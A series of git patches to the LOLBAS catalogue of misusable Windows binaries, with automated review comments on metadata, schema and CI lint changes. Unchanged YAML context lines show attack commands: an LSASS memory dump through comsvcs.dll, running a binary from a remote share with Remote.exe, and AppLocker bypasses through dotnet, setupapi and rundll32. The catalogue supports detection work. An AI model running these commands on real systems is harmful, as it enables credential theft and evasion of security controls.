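Review bot: In the Pcwutl.yml hunk the unchanged `Description: Microsoft HTML Viewer` is identical to the description in the Mshtml.yml hunk just above, which looks like a copy-paste left over rather than a description of pcwutl.dll itself. Since this commit is filling in missing metadata for these library entries, it is the right moment to replace that line with a one-sentence description of what the library actually does, confirmed against the DLL's own file description.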
@@ -1,7 +1,7 @@ --- Name: Shell32.dll Description: Windows Shell Common Dll -Author: +Author: LOLBAS Team Created: 2018-05-25 Commands: - Command: rundll32.exe shell32.dll,Control_RunDLL payload.dll diff --git a/yml/OSLibraries/Syssetup.yml b/yml/OSLibraries/Syssetup.yml index ad673b2..a9792f2 100644 --- a/yml/OSLibraries/Syssetup.yml +++ b/yml/OSLibraries/Syssetup.yml @@ -1,7 +1,7 @@ --- Name: Syssetup.dll Description: Windows NT System Setup -Author: +Author: LOLBAS Team Created: 2018-05-25 Commands: - Command: rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\test\shady.inf diff --git a/yml/OSLibraries/Url.yml b/yml/OSLibraries/Url.yml index 0de5892..a1d0a80 100644 --- a/yml/OSLibraries/Url.yml +++ b/yml/OSLibraries/Url.yml @@ -1,7 +1,7 @@ --- Name: Url.dll Description: Internet Shortcut Shell Extension DLL. -Author: +Author: LOLBAS Team Created: 2018-05-25 Commands: - Command: rundll32.exe url.dll,OpenURL "C:\test\calc.hta" diff --git a/yml/OSLibraries/Zipfldr.yml b/yml/OSLibraries/Zipfldr.yml index 129fad6..0630f1c 100644 --- a/yml/OSLibraries/Zipfldr.yml +++ b/yml/OSLibraries/Zipfldr.yml @@ -1,7 +1,7 @@ --- Name: Zipfldr.dll Description: Compressed Folder library -Author: +Author: LOLBAS Team Created: 2018-05-25 Commands: - Command: rundll32.exe zipfldr.dll,RouteTheCall calc.exe diff --git a/yml/OSLibraries/comsvcs.yml b/yml/OSLibraries/comsvcs.yml index 500214b..4eb5b2a 100644 --- a/yml/OSLibraries/comsvcs.yml +++ b/yml/OSLibraries/comsvcs.yml @@ -1,7 +1,7 @@ --- Name: Comsvcs.dll Description: COM+ Services -Author: +Author: LOLBAS Team Created: 2019-08-30 Commands: - Command: rundll32 C:\windows\system32\comsvcs.dll MiniDump "[LSASS_PID] dump.bin full" From a040ca3e4040da39bb7555274bb1a1aceb050bd5 Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sat, 10 Sep 2022 23:41:38 -0400 Subject: [PATCH 34/60] Adding missing OperatingSystem values to Ieadvpack.yml --- yml/OSLibraries/Ieadvpack.yml | 2 ++ 1 file changed, 2 insertions(+) 
diff --git a/yml/OSLibraries/Ieadvpack.yml b/yml/OSLibraries/Ieadvpack.yml index 9af9e84..0dcc668 100644 --- a/yml/OSLibraries/Ieadvpack.yml +++ b/yml/OSLibraries/Ieadvpack.yml @@ -31,12 +31,14 @@ Commands: Category: Execute Privileges: User MitreID: T1218.011 + OperatingSystem: Windows - Command: rundll32 ieadvpack.dll, RegisterOCX "cmd.exe /c calc.exe" Description: Launch command line by calling the RegisterOCX function. Usecase: Run an executable payload. Category: Execute Privileges: User MitreID: T1218.011 + OperatingSystem: Windows Full_Path: - Path: c:\windows\system32\ieadvpack.dll - Path: c:\windows\syswow64\ieadvpack.dll From 371d1cf2cc91f2b2ac7d7c2b961d8c82e72a751e Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sat, 10 Sep 2022 23:45:28 -0400 Subject: [PATCH 35/60] Correcting case in Usecase key names. --- yml/OSLibraries/Ieframe.yml | 2 +- yml/OSLibraries/Setupapi.yml | 4 ++-- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/yml/OSLibraries/Ieframe.yml b/yml/OSLibraries/Ieframe.yml index 73f8ee8..2423263 100644 --- a/yml/OSLibraries/Ieframe.yml +++ b/yml/OSLibraries/Ieframe.yml @@ -6,7 +6,7 @@ Created: '2018-05-25' Commands: - Command: rundll32.exe ieframe.dll,OpenURL "C:\test\calc.url" Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL. - UseCase: Load an executable payload by calling a .url file with or without quotes. The .url file extension can be renamed. + Usecase: Load an executable payload by calling a .url file with or without quotes. The .url file extension can be renamed. Category: Execute Privileges: User MitreID: T1218.011 diff --git a/yml/OSLibraries/Setupapi.yml b/yml/OSLibraries/Setupapi.yml index bd9d3a8..401c27b 100644 --- a/yml/OSLibraries/Setupapi.yml +++ b/yml/OSLibraries/Setupapi.yml 
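Review bot: The two added `OperatingSystem: Windows` lines in the Ieadvpack.yml hunk (and the matching pair in the Shell32.yml hunk of PATCH 36) satisfy the schema but carry less information than sibling entries, which list concrete versions such as `Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10`. A bare `Windows` reads as "every version", so if the versions these commands were verified on are known they should be listed, and if they are not, mirroring the value of the first command in the same file only makes sense when it genuinely applies. The `Commands` list these items belong to starts above the hunk.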
@@ -6,14 +6,14 @@ Created: '2018-05-25' Commands: - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Tools\shady.inf Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified). - UseCase: Run local or remote script(let) code through INF file specification. + Usecase: Run local or remote script(let) code through INF file specification. Category: AWL Bypass Privileges: User MitreID: T1218.011 OperatingSystem: Windows - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\\Tools\\calc_exe.inf Description: Launch an executable file via the InstallHinfSection function and .inf file section directive. - UseCase: Load an executable payload. + Usecase: Load an executable payload. Category: Execute Privileges: User MitreID: T1218.011 From c24cad786866a28dc545a5d31de73c82c1b89392 Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sat, 10 Sep 2022 23:48:38 -0400 Subject: [PATCH 36/60] Adding missing OperatingSystem values. --- yml/OSLibraries/Shell32.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/yml/OSLibraries/Shell32.yml b/yml/OSLibraries/Shell32.yml index 0afce49..302ded6 100644 --- a/yml/OSLibraries/Shell32.yml +++ b/yml/OSLibraries/Shell32.yml @@ -17,12 +17,14 @@ Commands: Category: Execute Privileges: User MitreID: T1218.011 + OperatingSystem: Windows - Command: rundll32 SHELL32.DLL,ShellExec_RunDLL "cmd.exe" "/c echo hi" Description: Launch command line by calling the ShellExec_RunDLL function. Usecase: Run an executable payload. Category: Execute Privileges: User MitreID: T1218.011 + OperatingSystem: Windows Full_Path: - Path: c:\windows\system32\shell32.dll - Path: c:\windows\syswow64\shell32.dll From 1bd305e3a3f817756b06060c3809bca94b00d87c Mon Sep 17 00:00:00 2001 
From: xenoscr Date: Sat, 10 Sep 2022 23:53:21 -0400 Subject: [PATCH 37/60] Adding missing Usecase values. --- yml/OtherMSBinaries/Dotnet.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/yml/OtherMSBinaries/Dotnet.yml b/yml/OtherMSBinaries/Dotnet.yml index 107fd5e..b202817 100644 --- a/yml/OtherMSBinaries/Dotnet.yml +++ b/yml/OtherMSBinaries/Dotnet.yml @@ -6,6 +6,7 @@ Created: 2019-11-12 Commands: - Command: dotnet.exe [PATH_TO_DLL] Description: dotnet.exe will execute any dll even if applocker is enabled. + Usecase: Execute code bypassing AWL Category: AWL Bypass Privileges: User MitreID: T1218 @@ -19,6 +20,7 @@ Commands: OperatingSystem: Windows 7 and up with .NET installed - Command: dotnet.exe msbuild [Path_TO_XML_CSPROJ] Description: dotnet.exe with msbuild (SDK Version) will execute unsigned code + Usecase: Execute code bypassing AWL Category: AWL Bypass Privileges: User MitreID: T1218 From c933426c1ac71ed5cabfdb8a22391e5bbe77edd8 Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sun, 11 Sep 2022 00:03:30 -0400 Subject: [PATCH 38/60] Adding missing Path value. --- yml/OtherMSBinaries/Msxsl.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OtherMSBinaries/Msxsl.yml b/yml/OtherMSBinaries/Msxsl.yml index 77a3a18..b7a2cb3 100644 --- a/yml/OtherMSBinaries/Msxsl.yml +++ b/yml/OtherMSBinaries/Msxsl.yml @@ -33,7 +33,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows Full_Path: - - Path: + - Path: no default Code_Sample: - Code: Detection: From aa1e1ea2be2db2773cc0e8d6f44f4695ec54b4cb Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sun, 11 Sep 2022 00:16:59 -0400 Subject: [PATCH 39/60] Adding no defualt paths to pass schema validations --- yml/OtherMSBinaries/Procdump.yml | 2 ++ yml/OtherMSBinaries/Rcsi.yml | 2 +- yml/OtherMSBinaries/Te.yml | 2 +- yml/OtherMSBinaries/Tracker.yml | 2 +- 4 files changed, 5 insertions(+), 3 deletions(-) diff --git a/yml/OtherMSBinaries/Procdump.yml b/yml/OtherMSBinaries/Procdump.yml index 546371f..fda943a 100644 
--- a/yml/OtherMSBinaries/Procdump.yml +++ b/yml/OtherMSBinaries/Procdump.yml @@ -18,6 +18,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher. +Full_Path: + - Path: no default Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/f36b1cbd2a3f1a7423f43a67a182549778700615/rules/windows/process_creation/win_susp_procdump.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/f36b1cbd2a3f1a7423f43a67a182549778700615/rules/windows/process_creation/win_procdump.yml diff --git a/yml/OtherMSBinaries/Rcsi.yml b/yml/OtherMSBinaries/Rcsi.yml index e15b4c9..0ef6457 100644 --- a/yml/OtherMSBinaries/Rcsi.yml +++ b/yml/OtherMSBinaries/Rcsi.yml @@ -19,7 +19,7 @@ Commands: MitreID: T1127 OperatingSystem: Windows Full_Path: - - Path: + - Path: no default Code_Sample: - Code: Detection: diff --git a/yml/OtherMSBinaries/Te.yml b/yml/OtherMSBinaries/Te.yml index ee6f3ce..ec3001d 100644 --- a/yml/OtherMSBinaries/Te.yml +++ b/yml/OtherMSBinaries/Te.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1127 OperatingSystem: Windows Full_Path: - - Path: + - Path: no default Code_Sample: - Code: Detection: diff --git a/yml/OtherMSBinaries/Tracker.yml b/yml/OtherMSBinaries/Tracker.yml index e1de666..2cfb356 100644 --- a/yml/OtherMSBinaries/Tracker.yml +++ b/yml/OtherMSBinaries/Tracker.yml @@ -19,7 +19,7 @@ Commands: MitreID: T1127 OperatingSystem: Windows Full_Path: - - Path: + - Path: no default Code_Sample: - Code: Detection: From 68e5795aec4caee5c7352caaca975b88721abf90 Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sun, 11 Sep 2022 00:20:05 -0400 Subject: [PATCH 40/60] Fixing Acknowledgement values. --- yml/OtherMSBinaries/Procdump.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OtherMSBinaries/Procdump.yml b/yml/OtherMSBinaries/Procdump.yml index fda943a..ce3205e 100644 --- a/yml/OtherMSBinaries/Procdump.yml +++ b/yml/OtherMSBinaries/Procdump.yml 
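Review bot: `- Path: no default` puts a free-text sentinel into `Full_Path`, a field whose other values are filesystem paths and which any consumer of this dataset (site generator, tooling that turns entries into path-based detection rules) will read as a path; the same string is introduced for Msxsl, Rcsi, Te and Tracker in this series. Fixing the schema is the cleaner route: make `Full_Path` optional in YML-Schema.yml, or allow an explicit `Full_Path: []`, so "no fixed install location" is representable without a magic string. If the schema cannot change, at least pick a value that cannot be mistaken for a path and document it in the schema file (YML-Schema.yml is not visible here, so I cannot tell which of these it currently permits).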
@@ -31,5 +31,5 @@ Detection: Resources: - Link: https://twitter.com/ajpc500/status/1448588362382778372?s=20 Acknowledgement: - - Name: Alfie Champion + - Person: Alfie Champion Handle: '@ajpc500' From 6e253a7a38df657799a3aea0d1d54925c23bfac5 Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sun, 11 Sep 2022 00:22:36 -0400 Subject: [PATCH 41/60] Adding missing OperatingSystem values. --- yml/OtherMSBinaries/Remote.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/yml/OtherMSBinaries/Remote.yml b/yml/OtherMSBinaries/Remote.yml index 2879a6e..cb0d65d 100644 --- a/yml/OtherMSBinaries/Remote.yml +++ b/yml/OtherMSBinaries/Remote.yml @@ -10,21 +10,21 @@ Commands: Category: AWL Bypass Privileges: User MitreID: T1127 - OperatingSystem: + OperatingSystem: Windows - Command: Remote.exe /s "powershell.exe" anythinghere Description: Spawns powershell as a child process of remote.exe Usecase: Executes a process under a trusted Microsoft signed binary Category: Execute Privileges: User MitreID: T1127 - OperatingSystem: + OperatingSystem: Windows - Command: Remote.exe /s "\\10.10.10.30\binaries\file.exe" anythinghere Description: Run a remote file Usecase: Executing a remote binary without saving file to disk Category: Execute Privileges: User MitreID: T1127 - OperatingSystem: + OperatingSystem: Windows Full_Path: - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\remote.exe - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\remote.exe From e91d11efc0ed7ad6945ec508f6f9c8e8696f8fa2 Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sun, 11 Sep 2022 00:28:17 -0400 Subject: [PATCH 42/60] Combining yaml linting and validation --- .github/workflows/validate-yaml-schema.yml | 31 ---------------------- .github/workflows/yaml-linting.yml | 22 ++++++++++++++- 2 files changed, 21 insertions(+), 32 deletions(-) delete mode 100644 .github/workflows/validate-yaml-schema.yml 
diff --git a/.github/workflows/validate-yaml-schema.yml b/.github/workflows/validate-yaml-schema.yml deleted file mode 100644 index 0ebaa39..0000000 --- a/.github/workflows/validate-yaml-schema.yml +++ /dev/null @@ -1,31 +0,0 @@ -name: Validate YAML Schema - -on: [push, pull_request] - -jobs: - build: - - runs-on: ubuntu-latest - - steps: - - uses: actions/checkout@v3 - - name: Validate OSBinaries YAML Schema - uses: cketti/action-pykwalify@v0.3-temp-fix - with: - files: yml/OSBinaries/*.yml - schema: YML-Schema.yml - - name: Validate OSLibraries YAML Schema - uses: cketti/action-pykwalify@v0.3-temp-fix - with: - files: yml/OSLibraries/*.yml - schema: YML-Schema.yml - - name: Validate OSScripts YAML Schema - uses: cketti/action-pykwalify@v0.3-temp-fix - with: - files: yml/OSScripts/*.yml - schema: YML-Schema.yml - - name: Validate OtherMSBinaries YAML Schema - uses: cketti/action-pykwalify@v0.3-temp-fix - with: - files: yml/OtherMSBinaries/*.yml - schema: YML-Schema.yml diff --git a/.github/workflows/yaml-linting.yml b/.github/workflows/yaml-linting.yml index 2150f0e..5f99cae 100644 --- a/.github/workflows/yaml-linting.yml +++ b/.github/workflows/yaml-linting.yml @@ -1,5 +1,5 @@ --- -name: YAML Lint Push Check +name: YAML Lint and Validation Push Check on: [push] jobs: @@ -11,3 +11,23 @@ jobs: uses: ibiqlik/action-yamllint@v3 with: config_file: .github/.yamllint + - name: Validate OSBinaries YAML Schema + uses: cketti/action-pykwalify@v0.3-temp-fix + with: + files: yml/OSBinaries/*.yml + schema: YML-Schema.yml + - name: Validate OSLibraries YAML Schema + uses: cketti/action-pykwalify@v0.3-temp-fix + with: + files: yml/OSLibraries/*.yml + schema: YML-Schema.yml + - name: Validate OSScripts YAML Schema + uses: cketti/action-pykwalify@v0.3-temp-fix + with: + files: yml/OSScripts/*.yml + schema: YML-Schema.yml + - name: Validate OtherMSBinaries YAML Schema + uses: cketti/action-pykwalify@v0.3-temp-fix + with: + files: yml/OtherMSBinaries/*.yml + schema: YML-Schema.yml 
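Review bot: The kept workflow yaml-linting.yml triggers on `on: [push]` only, whereas the deleted validate-yaml-schema.yml ran on `[push, pull_request]`, so schema validation no longer runs for pull requests opened from forks (push events fire only for branches inside this repository); change the kept trigger to `on: [push, pull_request]`. The third-party actions are referenced by mutable tags (`cketti/action-pykwalify@v0.3-temp-fix`, `ibiqlik/action-yamllint@v3`, `actions/checkout@v3`), so a moved tag upstream silently changes what executes in CI; pin each to a full commit SHA with the tag in a trailing comment. The job also declares no `permissions:` block and therefore runs with the default GITHUB_TOKEN scope; `permissions:` / `  contents: read` is all a lint-and-validate job needs.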
From fde53748f287bc6b9e9ab843f6403b02e062b59c Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sun, 11 Sep 2022 00:30:03 -0400 Subject: [PATCH 43/60] Fixed indent in yaml linting workflow --- .github/workflows/yaml-linting.yml | 40 +++++++++++++++--------------- 1 file changed, 20 insertions(+), 20 deletions(-) diff --git a/.github/workflows/yaml-linting.yml b/.github/workflows/yaml-linting.yml index 5f99cae..9835bb7 100644 --- a/.github/workflows/yaml-linting.yml +++ b/.github/workflows/yaml-linting.yml @@ -11,23 +11,23 @@ jobs: uses: ibiqlik/action-yamllint@v3 with: config_file: .github/.yamllint - - name: Validate OSBinaries YAML Schema - uses: cketti/action-pykwalify@v0.3-temp-fix - with: - files: yml/OSBinaries/*.yml - schema: YML-Schema.yml - - name: Validate OSLibraries YAML Schema - uses: cketti/action-pykwalify@v0.3-temp-fix - with: - files: yml/OSLibraries/*.yml - schema: YML-Schema.yml - - name: Validate OSScripts YAML Schema - uses: cketti/action-pykwalify@v0.3-temp-fix - with: - files: yml/OSScripts/*.yml - schema: YML-Schema.yml - - name: Validate OtherMSBinaries YAML Schema - uses: cketti/action-pykwalify@v0.3-temp-fix - with: - files: yml/OtherMSBinaries/*.yml - schema: YML-Schema.yml + - name: Validate OSBinaries YAML Schema + uses: cketti/action-pykwalify@v0.3-temp-fix + with: + files: yml/OSBinaries/*.yml + schema: YML-Schema.yml + - name: Validate OSLibraries YAML Schema + uses: cketti/action-pykwalify@v0.3-temp-fix + with: + files: yml/OSLibraries/*.yml + schema: YML-Schema.yml + - name: Validate OSScripts YAML Schema + uses: cketti/action-pykwalify@v0.3-temp-fix + with: + files: yml/OSScripts/*.yml + schema: YML-Schema.yml + - name: Validate OtherMSBinaries YAML Schema + uses: cketti/action-pykwalify@v0.3-temp-fix + with: + files: yml/OtherMSBinaries/*.yml + schema: YML-Schema.yml From 7bb5a8a8e3e3a6c2866e9b7864616afd59b4b337 Mon Sep 17 00:00:00 2001 
From: xenoscr Date: Sun, 11 Sep 2022 00:38:05 -0400 Subject: [PATCH 44/60] Updating yaml lint check to only check the yml folder --- .github/workflows/yaml-linting.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/yaml-linting.yml b/.github/workflows/yaml-linting.yml index 9835bb7..51b9c40 100644 --- a/.github/workflows/yaml-linting.yml +++ b/.github/workflows/yaml-linting.yml @@ -10,6 +10,7 @@ jobs: - name: yaml-lint uses: ibiqlik/action-yamllint@v3 with: + file_or_dir: yml/**/*.yml config_file: .github/.yamllint - name: Validate OSBinaries YAML Schema uses: cketti/action-pykwalify@v0.3-temp-fix From 98813fe01b5724729d8f0e556ae0e6dc48d8b9e2 Mon Sep 17 00:00:00 2001 
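Review bot: Restricting yamllint to `file_or_dir: yml/**/*.yml` means the workflow files under .github/workflows and YML-Schema.yml are no longer linted at all, which is a loss of coverage rather than a scoping fix; if the goal is only to keep non-content YAML out of the content ruleset, list both locations (`file_or_dir: yml/ .github/workflows/`). A directory argument is also safer than the `**` glob: yamllint recurses into directories itself, while `**` expansion depends on whether the action's shell has globstar enabled, which is not visible from the workflow.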
From: xenoscr Date: Sun, 11 Sep 2022 01:07:18 -0400 Subject: [PATCH 45/60] Fixing errors found in yaml lint action. --- .github/.yamllint.swp | Bin 0 -> 12288 bytes yml/OSBinaries/Atbroker.yml | 12 +++++------- yml/OSBinaries/Cmd.yml | 12 +++++------- yml/OSBinaries/Cmdkey.yml | 4 +--- yml/OSBinaries/Cmstp.yml | 18 ++++++++---------- yml/OSBinaries/Control.yml | 18 +++++++++--------- yml/OSBinaries/Csc.yml | 12 ++++++------ yml/OSBinaries/Cscript.yml | 22 +++++++++++----------- yml/OSBinaries/Dfsvc.yml | 4 ++-- yml/OSBinaries/Diskshadow.yml | 10 +++++----- yml/OSBinaries/Dnscmd.yml | 6 +++--- yml/OSBinaries/Esentutl.yml | 14 +++++++------- yml/OSBinaries/Expand.yml | 6 +++--- yml/OSBinaries/Extrac32.yml | 6 +++--- yml/OSBinaries/Findstr.yml | 4 ++-- yml/OSBinaries/Forfiles.yml | 4 ++-- yml/OSBinaries/Ftp.yml | 6 +++--- yml/OSBinaries/Infdefaultinstall.yml | 6 +++--- yml/OSBinaries/Mmc.yml | 6 +++--- yml/OSBinaries/Msbuild.yml | 2 +- yml/OSBinaries/Pnputil.yml | 2 +- yml/OSBinaries/Regsvr32.yml | 2 +- yml/OSBinaries/Runscripthelper.yml | 2 +- yml/OSBinaries/Schtasks.yml | 2 +- yml/OSBinaries/Wscript.yml | 2 +- yml/OSBinaries/Wuauclt.yml | 2 +- yml/OSLibraries/Desk.yml | 2 +- yml/OSLibraries/Dfshim.yml | 4 ++-- yml/OSLibraries/Shdocvw.yml | 8 ++++---- yml/OSScripts/pester.yml | 2 +- 30 files changed, 96 insertions(+), 104 deletions(-) create mode 100644 .github/.yamllint.swp 
diff --git a/.github/.yamllint.swp b/.github/.yamllint.swp new file mode 100644 index 0000000000000000000000000000000000000000..51bfcb2b025a8904c6942b2acc5f5e688b7b785d GIT binary patch literal 12288 zcmeI&Jx;?g7zSVmW`5K%G8h;tAvtM_gitovDitvxx-qzon;KlFN?qD6FeC234H(!t z0viY509=8AFC|?NRp~~h*U~E|@n***ZlE8U!E!0SG_<0uX=z1Rwwb2teS!3vg;i-6#|Cp-e69RcD-Q8!79g z(}@k~^p^^&hJv=OtNx7fY)lwsW7nBc;b Date: Sun, 11 Sep 2022 01:08:37 -0400 Subject: [PATCH 46/60] Changing yaml lint to error on unwanted conditions. --- .github/.yamllint | 8 ++++---- .github/.yamllint.swp | Bin 12288 -> 0 bytes 2 files changed, 4 insertions(+), 4 deletions(-) delete mode 100644 .github/.yamllint.swp diff --git a/.github/.yamllint b/.github/.yamllint index 10d94dd..7452167 100644 --- a/.github/.yamllint +++ b/.github/.yamllint @@ -4,12 +4,12 @@ yaml-files: - '*.yml' rules: new-line-at-end-of-file: - level: warning + level: error trailing-spaces: - level: warning + level: error line-length: level: warning new-lines: - level: warning + level: error indentation: - level: warning + level: error diff --git a/.github/.yamllint.swp b/.github/.yamllint.swp deleted file mode 100644 index 51bfcb2b025a8904c6942b2acc5f5e688b7b785d..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 12288 zcmeI&Jx;?g7zSVmW`5K%G8h;tAvtM_gitovDitvxx-qzon;KlFN?qD6FeC234H(!t z0viY509=8AFC|?NRp~~h*U~E|@n***ZlE8U!E!0SG_<0uX=z1Rwwb2teS!3vg;i-6#|Cp-e69RcD-Q8!79g z(}@k~^p^^&hJv=OtNx7fY)lwsW7nBc;b Date: Sun, 11 Sep 2022 01:23:21 -0400 Subject: [PATCH 47/60] Fixing more formatting errors. --- .github/workflows/yaml-linting.yml | 1 + yml/OSBinaries/Extexport.yml | 2 +- yml/OSBinaries/Installutil.yml | 8 ++++---- yml/OSBinaries/Vbc.yml | 6 +++--- 4 files changed, 9 insertions(+), 8 deletions(-) diff --git a/.github/workflows/yaml-linting.yml b/.github/workflows/yaml-linting.yml index 51b9c40..5782c37 100644 --- a/.github/workflows/yaml-linting.yml +++ b/.github/workflows/yaml-linting.yml 
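Review bot: The `.github/.yamllint.swp` removed here is a Vim swap file that the previous commit in this series added, and the diffstat for commit 48 shows the same thing recurring with `yml/OSBinaries/.AppInstaller.yml.swp`; add `*.swp` and `*~` to a `.gitignore` so editor artifacts cannot land in history. Swap files carry unsaved buffer contents, so they are worth excluding even in a public data repository. In the `.yamllint` change itself, `line-length` is the only rule left at `level: warning` after everything else was promoted to `error`; if that is deliberate, a one-line comment on the rule explaining why (`# long Command/Link values are expected`) saves the next reader from wondering whether it was missed.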
@@ -10,6 +10,7 @@ jobs: - name: yaml-lint uses: ibiqlik/action-yamllint@v3 with: + no_warnings: true file_or_dir: yml/**/*.yml config_file: .github/.yamllint - name: Validate OSBinaries YAML Schema diff --git a/yml/OSBinaries/Extexport.yml b/yml/OSBinaries/Extexport.yml index 14aef3f..5b8080d 100644 --- a/yml/OSBinaries/Extexport.yml +++ b/yml/OSBinaries/Extexport.yml @@ -15,7 +15,7 @@ Full_Path: - Path: C:\Program Files\Internet Explorer\Extexport.exe - Path: C:\Program Files (x86)\Internet Explorer\Extexport.exe Code_Sample: - - Code: + - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/0f33cbc85bf4b23b8d8308bfcc8b21a9e5431ee7/rules/windows/process_creation/win_pc_lolbas_extexport.yml - IOC: Extexport.exe loads dll and is execute from other folder the original path diff --git a/yml/OSBinaries/Installutil.yml b/yml/OSBinaries/Installutil.yml index 8514236..b257c39 100644 --- a/yml/OSBinaries/Installutil.yml +++ b/yml/OSBinaries/Installutil.yml 
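Review bot: `no_warnings: true` suppresses yamllint's warning output entirely, and since `.github/.yamllint` keeps `line-length` at `level: warning` that rule can now never surface in CI. If long lines are acceptable in the data files, say so in the config with `line-length: disable`; if they are not, promote the rule to `error` and drop `no_warnings`. Either is clearer than a warning that is configured but can never be seen.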
@@ -24,11 +24,11 @@ Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe Code_Sample: -- Code: + - Code: Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/a04fbe2a99f1dcbbfeb0ee4957ae4b06b0866254/rules/windows/process_creation/win_possible_applocker_bypass.yml - - Elastic: https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/defense_evasion_installutil_beacon.toml - - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml + - Sigma: https://github.com/SigmaHQ/sigma/blob/a04fbe2a99f1dcbbfeb0ee4957ae4b06b0866254/rules/windows/process_creation/win_possible_applocker_bypass.yml + - Elastic: https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/defense_evasion_installutil_beacon.toml + - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml Resources: - Link: https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/ - Link: https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12 diff --git a/yml/OSBinaries/Vbc.yml b/yml/OSBinaries/Vbc.yml index 6f41d61..775a788 100644 --- a/yml/OSBinaries/Vbc.yml +++ b/yml/OSBinaries/Vbc.yml 
@@ -22,10 +22,10 @@ Full_Path: - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v3.5\vbc.exe Code_Sample: - - Code: + - Code: Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_visual_basic_compiler.yml - - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml + - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_visual_basic_compiler.yml + - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml Acknowledgement: - Person: Lior Adar Handle: From 654cdd2d61ae72cebfbbb44ab9c1e49876593803 Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sun, 11 Sep 2022 01:33:36 -0400 Subject: [PATCH 48/60] Fixing file formating. --- yml/OSBinaries/.AppInstaller.yml.swp | Bin 0 -> 12288 bytes yml/OSBinaries/Aspnet_Compiler.yml | 54 ++++++------- yml/OSBinaries/Finger.yml | 60 +++++++------- yml/OSLibraries/Dfshim.yml | 56 ++++++------- yml/OSScripts/CL_LoadAssembly.yml | 48 +++++------ yml/OtherMSBinaries/Fsi.yml | 76 +++++++++--------- yml/OtherMSBinaries/Procdump.yml | 70 ++++++++-------- yml/OtherMSBinaries/VisualUiaVerifyNative.yml | 60 +++++++------- yml/OtherMSBinaries/Wfc.yml | 54 ++++++------- 9 files changed, 239 insertions(+), 239 deletions(-) create mode 100644 yml/OSBinaries/.AppInstaller.yml.swp 
